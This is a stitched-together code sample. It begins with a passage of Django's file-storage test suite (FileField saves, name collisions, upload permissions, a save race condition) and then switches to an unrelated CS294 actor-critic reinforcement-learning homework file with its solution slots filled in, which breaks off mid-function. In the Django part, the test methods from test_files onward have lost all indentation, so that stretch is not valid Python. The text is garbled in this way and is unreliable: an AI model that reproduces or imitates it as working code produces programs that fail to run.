    """Rerun the FileStorageTests suite against DiscardingFalseContentStorage."""
    storage_class = DiscardingFalseContentStorage
    def test_custom_storage_discarding_empty_content(self):
        """
        When Storage.save() wraps a file-like object in File, it should include
        the name argument so that bool(file) evaluates to True (#26495).
        """
        output = StringIO('content')
        self.storage.save('tests/stringio', output)
        self.assertTrue(self.storage.exists('tests/stringio'))
        with self.storage.open('tests/stringio') as f:
            self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
    def tearDown(self):
        # Remove the shared temp_storage tree so each test starts clean.
        shutil.rmtree(temp_storage_location)
    def _storage_max_filename_length(self, storage):
        """
        Query filesystem for maximum filename length (e.g. AUFS has 242).
        """
        dir_to_test = storage.location
        # Walk up to the nearest existing ancestor, since pathconf() requires
        # a path that actually exists.
        while not os.path.exists(dir_to_test):
            dir_to_test = os.path.dirname(dir_to_test)
        try:
            return os.pathconf(dir_to_test, 'PC_NAME_MAX')
        except Exception:
            return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform == 'win32',
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save('some_file1.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_callable.name, 'bar/some_file1.txt')
obj.pathlib_direct.save('some_file2.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_direct.name, 'bar/some_file2.txt')
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as Python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FieldCallableFileStorageTests(SimpleTestCase):
    """Tests for FileField(storage=...) accepting a callable (or class)
    that is evaluated lazily to produce the actual Storage instance."""

    def setUp(self):
        self.temp_storage_location = tempfile.mkdtemp(suffix='filefield_callable_storage')

    def tearDown(self):
        shutil.rmtree(self.temp_storage_location)

    def test_callable_base_class_error_raises(self):
        # A callable/class that is not a Storage subclass must be rejected
        # at field-construction time with a clear TypeError.
        class NotStorage:
            pass
        msg = 'FileField.storage must be a subclass/instance of django.core.files.storage.Storage'
        for invalid_type in (NotStorage, str, list, set, tuple):
            with self.subTest(invalid_type=invalid_type):
                with self.assertRaisesMessage(TypeError, msg):
                    FileField(storage=invalid_type)

    def test_file_field_storage_none_uses_default_storage(self):
        self.assertEqual(FileField().storage, default_storage)

    def test_callable_function_storage_file_field(self):
        # A plain function returning a Storage instance: the field exposes
        # the returned instance, not the function.
        storage = FileSystemStorage(location=self.temp_storage_location)

        def get_storage():
            return storage

        obj = FileField(storage=get_storage)
        self.assertEqual(obj.storage, storage)
        self.assertEqual(obj.storage.location, storage.location)

    def test_callable_class_storage_file_field(self):
        # Passing a Storage subclass itself: the field instantiates it.
        class GetStorage(FileSystemStorage):
            pass

        obj = FileField(storage=GetStorage)
        self.assertIsInstance(obj.storage, BaseStorage)

    def test_callable_storage_file_field_in_model(self):
        obj = Storage()
        self.assertEqual(obj.storage_callable.storage, temp_storage)
        self.assertEqual(obj.storage_callable.storage.location, temp_storage_location)
        self.assertIsInstance(obj.storage_callable_class.storage, BaseStorage)

    def test_deconstruction(self):
        """
        Deconstructing gives the original callable, not the evaluated value.
        """
        obj = Storage()
        *_, kwargs = obj._meta.get_field('storage_callable').deconstruct()
        storage = kwargs['storage']
        self.assertIs(storage, callable_storage)
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
    """ContentFile whose chunks() stalls for a second, widening the window
    for two concurrent save() calls to collide on the same name."""
    def chunks(self):
        time.sleep(1)  # force overlap between the racing save() calls
        return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
    """Two concurrent saves to the same name must yield two distinct files
    (#4948): one keeps the name, the other gets a random suffix."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)
        # Background thread performs the competing save of 'conflict'.
        self.thread = threading.Thread(target=self.save_file, args=['conflict'])

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def save_file(self, name):
        # SlowFile sleeps inside chunks(), keeping both saves in flight.
        name = self.storage.save(name, SlowFile(b"Data"))

    def test_race_condition(self):
        self.thread.start()
        self.save_file('conflict')
        self.thread.join()
        files = sorted(os.listdir(self.storage_dir))
        # Exactly one save wins the plain name; the loser is suffixed.
        self.assertEqual(files[0], 'conflict')
        self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform == 'win32', "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
    """File/directory mode bits applied by FileSystemStorage, with and
    without the FILE_UPLOAD_*_PERMISSIONS settings."""

    def setUp(self):
        # Install a known umask so the "default permissions" expectations
        # are deterministic; restored in tearDown.
        self.umask = 0o027
        self.old_umask = os.umask(self.umask)
        self.storage_dir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.storage_dir)
        os.umask(self.old_umask)

    @override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
    def test_file_upload_permissions(self):
        # Explicit setting wins over the umask.
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save("the_file", ContentFile("data"))
        actual_mode = os.stat(self.storage.path(name))[0] & 0o777
        self.assertEqual(actual_mode, 0o654)

    @override_settings(FILE_UPLOAD_PERMISSIONS=None)
    def test_file_upload_default_permissions(self):
        # With no setting, the OS default (0o666 masked by umask) applies.
        self.storage = FileSystemStorage(self.storage_dir)
        fname = self.storage.save("some_file", ContentFile("data"))
        mode = os.stat(self.storage.path(fname))[0] & 0o777
        self.assertEqual(mode, 0o666 & ~self.umask)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
    def test_file_upload_directory_permissions(self):
        # The setting applies to every intermediate directory created.
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
        file_path = Path(self.storage.path(name))
        self.assertEqual(file_path.parent.stat().st_mode & 0o777, 0o765)
        self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, 0o765)

    @override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
    def test_file_upload_directory_default_permissions(self):
        self.storage = FileSystemStorage(self.storage_dir)
        name = self.storage.save('the_directory/subdir/the_file', ContentFile('data'))
        file_path = Path(self.storage.path(name))
        # Directories default to 0o777 masked by the process umask.
        expected_mode = 0o777 & ~self.umask
        self.assertEqual(file_path.parent.stat().st_mode & 0o777, expected_mode)
        self.assertEqual(file_path.parent.parent.stat().st_mode & 0o777, expected_mode)
class FileStoragePathParsing(SimpleTestCase):
    """Collision-suffix placement when dots appear in directory names or
    as the first character of the file name."""

    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_directory_with_dot(self):
        """Regression test for #9610.

        If the directory name contains a dot and the file name doesn't, make
        sure we still mangle the file name instead of the directory name.
        """
        self.storage.save('dotted.path/test', ContentFile("1"))
        self.storage.save('dotted.path/test', ContentFile("2"))
        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        # The directory name must be untouched; only the file gets a suffix.
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], 'test')
        self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an extension,
        and the underscore should get added to the end.
        """
        self.storage.save('dotted.path/.test', ContentFile("1"))
        self.storage.save('dotted.path/.test', ContentFile("2"))
        files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
        self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
        self.assertEqual(files[0], '.test')
        self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
    def setUp(self):
        self.storage_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(self.storage_dir)

    def tearDown(self):
        shutil.rmtree(self.storage_dir)

    def test_content_saving(self):
        """
        ContentFile can be saved correctly with the filesystem storage,
        if it was initialized with either bytes or unicode content.
        """
        # Both variants must save without raising; 'español' additionally
        # exercises non-ASCII text encoding on write.
        self.storage.save('bytes.txt', ContentFile(b"content"))
        self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    Test file-like objects (#15644).
    """
    available_apps = []

    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)

    def tearDown(self):
        shutil.rmtree(self.temp_dir)

    def test_urllib_request_urlopen(self):
        """
        Test the File storage API with a file-like object coming from
        urllib.request.urlopen().
        """
        # Wrap the HTTP response (a file-like object with no seek()) and
        # save it through the storage API.
        file_like_object = urlopen(self.live_server_url + '/')
        f = File(file_like_object)
        stored_filename = self.storage.save("remote_file.html", f)
        # Fetch the page a second time as the reference copy; the first
        # response was consumed by save().
        remote_file = urlopen(self.live_server_url + '/')
        with self.storage.open(stored_filename) as stored_file:
            self.assertEqual(stored_file.read(), remote_file.read())
|
train_ac_f18.py | """
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
"""
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
    """Build a feedforward neural network (TF1 graph mode).

    arguments:
        input_placeholder: placeholder variable for the state (batch_size, input_size)
        output_size: size of the output layer
        scope: variable scope of the network
        n_layers: number of hidden layers
        size: dimension of each hidden layer
        activation: activation of the hidden layers
        output_activation: activation of the output layer

    returns:
        output tensor of the network (the result of a forward pass)
    """
    with tf.variable_scope(scope):
        # Stack n_layers dense hidden layers, then a final linear(ish) head.
        hidden = input_placeholder
        for _ in range(n_layers):
            hidden = tf.layers.dense(inputs=hidden, units=size, activation=activation)
        return tf.layers.dense(inputs=hidden, units=output_size, activation=output_activation)
def pathlength(path):
    """Return the number of timesteps in a rollout dict (length of its rewards)."""
    rewards = path["reward"]
    return len(rewards)
def setup_logger(logdir, locals_):
    """Configure the logz output directory and record train_AC's parameters.

    arguments:
        logdir: directory logz should write experiment logs into
        locals_: dict of the caller's local variables (typically locals()
            captured at the top of train_AC); values matching train_AC's
            argument names are saved as the experiment's parameters
    """
    # Configure output directory for logging
    logz.configure_output_dir(logdir)
    # Log experimental parameters.
    # getfullargspec replaces getargspec, which was deprecated since
    # Python 3.0 and removed in Python 3.11; [0] is the positional-arg
    # name list in both.
    args = inspect.getfullargspec(train_AC)[0]
    params = {k: locals_.get(k) for k in args}
    logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
    """Actor-critic agent (TF1 graph mode).

    Owns the policy ("actor") and value-function ("critic") networks,
    trajectory sampling against a gym env, advantage estimation, and the
    update ops for both networks. build_computation_graph() must be called
    before init_tf_sess().
    """

    def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
        super(Agent, self).__init__()
        # Network / optimization hyperparameters.
        self.ob_dim = computation_graph_args['ob_dim']
        self.ac_dim = computation_graph_args['ac_dim']
        self.discrete = computation_graph_args['discrete']
        self.size = computation_graph_args['size']
        self.n_layers = computation_graph_args['n_layers']
        self.learning_rate = computation_graph_args['learning_rate']
        self.num_target_updates = computation_graph_args['num_target_updates']
        self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
        # Rollout-collection settings.
        self.animate = sample_trajectory_args['animate']
        self.max_path_length = sample_trajectory_args['max_path_length']
        self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
        # Advantage-estimation settings.
        self.gamma = estimate_advantage_args['gamma']
        self.normalize_advantages = estimate_advantage_args['normalize_advantages']

    def init_tf_sess(self):
        """Create the TF session and initialize all graph variables."""
        tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
        tf_config.gpu_options.allow_growth = True  # may need if using GPU
        self.sess = tf.Session(config=tf_config)
        self.sess.__enter__()  # equivalent to `with self.sess:`
        tf.global_variables_initializer().run()  # pylint: disable=E1101

    def define_placeholders(self):
        """
        Placeholders for batch observations / actions / advantages in actor critic
        loss function.

        See Agent.build_computation_graph for notation

        returns:
            sy_ob_no: placeholder for observations
            sy_ac_na: placeholder for actions
            sy_adv_n: placeholder for advantages
        """
        sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
        # Discrete actions are integer indices; continuous are float vectors.
        if self.discrete:
            sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
        else:
            sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
        # YOUR HW2 CODE HERE
        sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
        return sy_ob_no, sy_ac_na, sy_adv_n

    def policy_forward_pass(self, sy_ob_no):
        """ Constructs the symbolic operation for the policy network outputs,
            which are the parameters of the policy distribution p(a|s)

            arguments:
                sy_ob_no: (batch_size, self.ob_dim)

            returns:
                the parameters of the policy.

                if discrete, the parameters are the logits of a categorical distribution
                    over the actions
                    sy_logits_na: (batch_size, self.ac_dim)

                if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
                    distribution over actions. log_std should just be a trainable
                    variable, not a network output.
                    sy_mean: (batch_size, self.ac_dim)
                    sy_logstd: (self.ac_dim,)

            Hint: use the 'build_mlp' function to output the logits (in the discrete case)
                and the mean (in the continuous case).
                Pass in self.n_layers for the 'n_layers' argument, and
                pass in self.size for the 'size' argument.
        """
        if self.discrete:
            # YOUR_HW2 CODE_HERE
            sy_logits_na = build_mlp(
                sy_ob_no,
                output_size=self.ac_dim,
                scope="nn",
                n_layers=self.n_layers,
                size=self.size,
                activation=tf.nn.tanh,
            )
            return sy_logits_na
        else:
            # YOUR_HW2 CODE_HERE
            # Mean comes from the network; log-std is a free trainable vector
            # shared across states.
            sy_mean = build_mlp(
                sy_ob_no,
                output_size=self.ac_dim,
                scope="nn",
                n_layers=self.n_layers,
                size=self.size,
                activation=tf.nn.tanh,
            )
            sy_logstd = tf.get_variable(name="logstd", shape=[self.ac_dim])
            return (sy_mean, sy_logstd)

    def sample_action(self, policy_parameters):
        """ Constructs a symbolic operation for stochastically sampling from the policy
            distribution

            arguments:
                policy_parameters
                    if discrete: logits of a categorical distribution over actions
                        sy_logits_na: (batch_size, self.ac_dim)
                    if continuous: (mean, log_std) of a Gaussian distribution over actions
                        sy_mean: (batch_size, self.ac_dim)
                        sy_logstd: (self.ac_dim,)

            returns:
                sy_sampled_ac:
                    if discrete: (batch_size)
                    if continuous: (batch_size, self.ac_dim)

            Hint: for the continuous case, use the reparameterization trick:
                 The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
                      mu + sigma * z,         z ~ N(0, I)
                 This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
        """
        if self.discrete:
            sy_logits_na = policy_parameters
            # YOUR_HW2 CODE_HERE
            # tf.multinomial samples one action index per row of logits.
            sy_sampled_ac = tf.squeeze(
                tf.multinomial(sy_logits_na, num_samples=1),
                axis=[1])
        else:
            sy_mean, sy_logstd = policy_parameters
            # YOUR_HW2 CODE_HERE
            # Reparameterization trick: a = mu + exp(logstd) * z, z ~ N(0, I).
            z = tf.random_normal(shape=tf.shape(sy_mean))
            sy_sampled_ac = sy_mean + tf.multiply(tf.exp(sy_logstd), z)
        return sy_sampled_ac

    def get_log_prob(self, policy_parameters, sy_ac_na):
        """ Constructs a symbolic operation for computing the log probability of a set of actions
            that were actually taken according to the policy

            arguments:
                policy_parameters
                    if discrete: logits of a categorical distribution over actions
                        sy_logits_na: (batch_size, self.ac_dim)
                    if continuous: (mean, log_std) of a Gaussian distribution over actions
                        sy_mean: (batch_size, self.ac_dim)
                        sy_logstd: (self.ac_dim,)

                sy_ac_na: (batch_size, self.ac_dim)

            returns:
                sy_logprob_n: (batch_size)

            Hint:
                For the discrete case, use the log probability under a categorical distribution.
                For the continuous case, use the log probability under a multivariate gaussian.
        """
        if self.discrete:
            sy_logits_na = policy_parameters
            # YOUR_HW2 CODE_HERE
            # Cross-entropy with the taken action index = -log pi(a|s).
            sy_logprob_n = - tf.nn.sparse_softmax_cross_entropy_with_logits(
                labels=sy_ac_na, logits=sy_logits_na)
        else:
            sy_mean, sy_logstd = policy_parameters
            # YOUR_HW2 CODE_HERE
            distribution = tfp.distributions.MultivariateNormalDiag(
                loc=sy_mean, scale_diag=tf.exp(sy_logstd))
            sy_logprob_n = distribution.log_prob(sy_ac_na)
        return sy_logprob_n

    def build_computation_graph(self):
        """
        Notes on notation:

        Symbolic variables have the prefix sy_, to distinguish them from the numerical values
        that are computed later in the function

        Prefixes and suffixes:
        ob - observation
        ac - action
        _no - this tensor should have shape (batch self.size /n/, observation dim)
        _na - this tensor should have shape (batch self.size /n/, action dim)
        _n  - this tensor should have shape (batch self.size /n/)

        Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
        is None

        ----------------------------------------------------------------------------------
        loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
            to get the policy gradient.
        """
        self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()

        # The policy takes in an observation and produces a distribution over the action space
        self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)

        # We can sample actions from this action distribution.
        # This will be called in Agent.sample_trajectory() where we generate a rollout.
        self.sy_sampled_ac = self.sample_action(self.policy_parameters)

        # We can also compute the logprob of the actions that were actually taken by the policy
        # This is used in the loss function.
        self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
        # Policy-gradient surrogate loss: maximize logprob-weighted advantages.
        actor_loss = tf.reduce_sum(-self.sy_logprob_n * self.sy_adv_n)
        self.actor_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(actor_loss)

        # define the critic: a state-value network V(s) trained by regression
        # onto bootstrapped targets (see update_critic).
        self.critic_prediction = tf.squeeze(build_mlp(
            self.sy_ob_no,
            1,
            "nn_critic",
            n_layers=self.n_layers,
            size=self.size))
        self.sy_target_n = tf.placeholder(shape=[None], name="critic_target", dtype=tf.float32)
        self.critic_loss = tf.losses.mean_squared_error(self.sy_target_n, self.critic_prediction)
        self.critic_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(self.critic_loss)

    def sample_trajectories(self, itr, env):
        """Collect complete rollouts until at least min_timesteps_per_batch
        timesteps have been gathered; returns (paths, timesteps_this_batch)."""
        # Collect paths until we have enough timesteps
        timesteps_this_batch = 0
        paths = []
        while True:
            # Optionally render the first episode of every 10th iteration.
            animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and self.animate)
            path = self.sample_trajectory(env, animate_this_episode)
            paths.append(path)
            timesteps_this_batch += pathlength(path)
            if timesteps_this_batch > self.min_timesteps_per_batch:
                break
        return paths, timesteps_this_batch

    def sample_trajectory(self, env, animate_this_episode):
        """Roll out one episode with the current policy; returns a path dict
        of numpy arrays (observation/reward/action/next_observation/terminal)."""
        ob = env.reset()
        obs, acs, rewards, next_obs, terminals = [], [], [], [], []
        steps = 0
        while True:
            if animate_this_episode:
                env.render()
                time.sleep(0.1)
            obs.append(ob)
            # YOUR HW2 CODE HERE
            # Query the sampled-action op for this single observation
            # (add/remove the batch axis around the sess.run call).
            ac = self.sess.run(self.sy_sampled_ac,
                               feed_dict={self.sy_ob_no: ob[np.newaxis, :]})
            ac = ac[0]
            acs.append(ac)
            ob, rew, done, _ = env.step(ac)
            # add the observation after taking a step to next_obs
            # YOUR CODE HERE
            next_obs.append(ob)
            rewards.append(rew)
            steps += 1
            # If the episode ended, the corresponding terminal value is 1
            # otherwise, it is 0
            # YOUR CODE HERE
            # NOTE(review): hitting max_path_length is also marked terminal=1,
            # which truncates bootstrapping at the time limit.
            if done or steps > self.max_path_length:
                terminals.append(1)
                break
            else:
                terminals.append(0)
        path = {"observation": np.array(obs, dtype=np.float32),
                "reward": np.array(rewards, dtype=np.float32),
                "action": np.array(acs, dtype=np.float32),
                "next_observation": np.array(next_obs, dtype=np.float32),
                "terminal": np.array(terminals, dtype=np.float32)}
        return path

    def estimate_advantage(self, ob_no, next_ob_no, re_n, terminal_n):
        """
        Estimates the advantage function value for each timestep.

        let sum_of_path_lengths be the sum of the lengths of the paths sampled from
            Agent.sample_trajectories

        arguments:
            ob_no: shape: (sum_of_path_lengths, ob_dim)
            next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
            re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
                the reward for each timestep
            terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
                at that timestep or 0 if the episode did not end

        returns:
            adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
                advantages whose length is the sum of the lengths of the paths
        """
        # First, estimate the Q value as Q(s, a) = r(s, a) + gamma*V(s')
        # To get the advantage, subtract the V(s) to get A(s, a) = Q(s, a) - V(s)
        # This requires calling the critic twice --- to obtain V(s') when calculating Q(s, a),
        # and V(s) when subtracting the baseline
        # Note: don't forget to use terminal_n to cut off the V(s') term when computing Q(s, a)
        # otherwise the values will grow without bound.
        # YOUR CODE HERE
        q_n = re_n + (1.0 - terminal_n) * self.gamma * self.sess.run(
            self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
        adv_n = q_n - self.sess.run(
            self.critic_prediction, feed_dict={self.sy_ob_no: ob_no})
        if self.normalize_advantages:
            # YOUR_HW2 CODE_HERE
            # Standardize to zero mean / unit std for gradient stability.
            adv_n = (adv_n - np.mean(adv_n)) / np.std(adv_n)
        return adv_n

    def update_critic(self, ob_no, next_ob_no, re_n, terminal_n):
        """
        Update the parameters of the critic.

        let sum_of_path_lengths be the sum of the lengths of the paths sampled from
            Agent.sample_trajectories
        let num_paths be the number of paths sampled from Agent.sample_trajectories

        arguments:
            ob_no: shape: (sum_of_path_lengths, ob_dim)
            next_ob_no: shape: (sum_of_path_lengths, ob_dim). The observation after taking one step forward
            re_n: length: sum_of_path_lengths. Each element in re_n is a scalar containing
                the reward for each timestep
            terminal_n: length: sum_of_path_lengths. Each element in terminal_n is either 1 if the episode ended
                at that timestep or 0 if the episode did not end

        returns:
            nothing
        """
        # Use a bootstrapped target values to update the critic
        # Compute the target values r(s, a) + gamma*V(s') by calling the critic to compute V(s')
        # In total, take n=self.num_grad_steps_per_target_update*self.num_target_updates gradient update steps
        # Every self.num_grad_steps_per_target_update steps, recompute the target values
        # by evaluating V(s') on the updated critic
        # Note: don't forget to use terminal_n to cut off the V(s') term when computing the target
        # otherwise the values will grow without bound.
        # YOUR CODE HERE
        for i in range(self.num_target_updates):
            # Recompute bootstrapped targets with the current critic weights.
            target_n = re_n + (1.0 - terminal_n) * self.gamma * self.sess.run(
                self.critic_prediction, feed_dict={self.sy_ob_no: next_ob_no})
            for j in range(self.num_grad_steps_per_target_update):
                self.sess.run(self.critic_update_op, feed_dict={
                    self.sy_ob_no: ob_no,
                    self.sy_target_n: target_n,
                })

    def update_actor(self, ob_no, ac_na, adv_n):
        """
        Update the parameters of the policy.

        arguments:
            ob_no: shape: (sum_of_path_lengths, ob_dim)
            ac_na: shape: (sum_of_path_lengths).
            adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
                advantages whose length is the sum of the lengths of the paths

        returns:
            nothing
        """
        self.sess.run(self.actor_update_op,
                      feed_dict={self.sy_ob_no: ob_no, self.sy_ac_na: ac_na, self.sy_adv_n: adv_n})
def train_AC(
        exp_name,
        env_name,
        n_iter,
        gamma,
        min_timesteps_per_batch,
        max_path_length,
        learning_rate,
